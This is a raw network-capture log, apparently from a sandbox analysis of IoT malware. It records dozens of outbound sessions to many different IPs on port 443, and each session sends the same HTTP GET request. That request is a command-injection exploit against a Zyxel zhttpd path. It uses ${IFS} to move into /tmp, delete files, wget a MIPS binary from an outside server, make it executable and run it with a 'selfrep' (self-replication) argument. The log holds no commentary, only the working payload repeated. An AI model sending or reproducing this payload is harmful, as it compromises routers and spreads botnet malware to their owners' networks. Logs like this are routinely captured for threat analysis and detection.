                                                        Feb 2, 2024 06:21:02.793818951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2783192.168.2.1460712160.59.186.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793853045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2784192.168.2.1449856219.67.165.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793867111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2785192.168.2.1445204134.110.243.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793906927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2786192.168.2.1449282112.35.186.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793939114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2787192.168.2.1450116178.103.59.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793973923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2788192.168.2.144863220.19.194.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.793997049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2789192.168.2.145366089.191.255.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794063091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2790192.168.2.144815435.199.209.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794095039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2791192.168.2.143970651.29.15.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794114113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2792192.168.2.145434874.121.196.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794154882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2793192.168.2.14393982.54.243.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794181108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2794192.168.2.1441962122.84.138.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794218063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2795192.168.2.1450102198.201.14.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794258118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2796192.168.2.1444222208.249.27.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794296980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2797192.168.2.1454298101.97.188.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794338942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2798192.168.2.1444148109.156.103.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794368029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2799192.168.2.1440102142.163.195.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794401884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2800192.168.2.1442580184.2.209.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794441938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2801192.168.2.1455610105.100.195.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794501066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2802192.168.2.1433766191.226.160.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794528961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2803192.168.2.143848889.182.141.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794567108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2804192.168.2.143376695.235.111.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794609070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2805192.168.2.1443614170.135.210.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794662952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2806192.168.2.1457354220.183.201.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794693947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2807192.168.2.1456016200.110.149.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794737101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2808192.168.2.144251220.127.188.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794760942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2809192.168.2.1447436147.232.58.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794811010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2810192.168.2.1444792166.27.253.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.794857979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2811192.168.2.1447674126.50.196.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.798337936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2812192.168.2.1441858103.137.85.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.798372984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2813192.168.2.1449258115.32.149.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.807427883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2814192.168.2.1445256119.56.161.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.807462931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2815192.168.2.1455118104.236.59.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.807518005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2816192.168.2.144195676.183.2.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.807565928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2817192.168.2.1451702197.160.68.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.807616949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2818192.168.2.1460294131.211.67.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.807641983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2819192.168.2.1454646140.132.220.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.807672024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2820192.168.2.1442738198.125.21.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.807718992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2821192.168.2.144152695.207.10.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.807758093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2822192.168.2.1434528211.106.25.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.807796001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2823192.168.2.143442834.190.89.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.807836056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2824192.168.2.14467348.148.14.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.807869911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2825192.168.2.1441142203.130.31.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.807904005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2826192.168.2.145297824.170.165.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.807957888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2827192.168.2.1439298201.202.171.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.807988882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2828192.168.2.145241682.239.215.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808016062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2829192.168.2.1452908151.246.169.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808068037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2830192.168.2.1447904152.165.47.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808109999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2831192.168.2.1442406129.113.203.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808140993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2832192.168.2.145900634.120.240.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808186054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2833192.168.2.1454574203.222.174.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808248043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2834192.168.2.145345279.66.191.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808264017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2835192.168.2.1459220140.30.208.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808306932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2836192.168.2.145882654.12.99.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808341980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2837192.168.2.143311431.37.120.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808362007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2838192.168.2.1455730154.52.2.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808414936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2839192.168.2.1435080189.9.28.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808465004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2840192.168.2.143679839.196.157.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808501005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2841192.168.2.1460334171.34.118.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808546066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2842192.168.2.1432814118.23.191.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808577061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2843192.168.2.143442852.214.221.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808634043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2844192.168.2.1437402159.1.163.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:03.808667898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2845192.168.2.143766013.188.27.114443
                                                        TimestampBytes transferredDirectionData
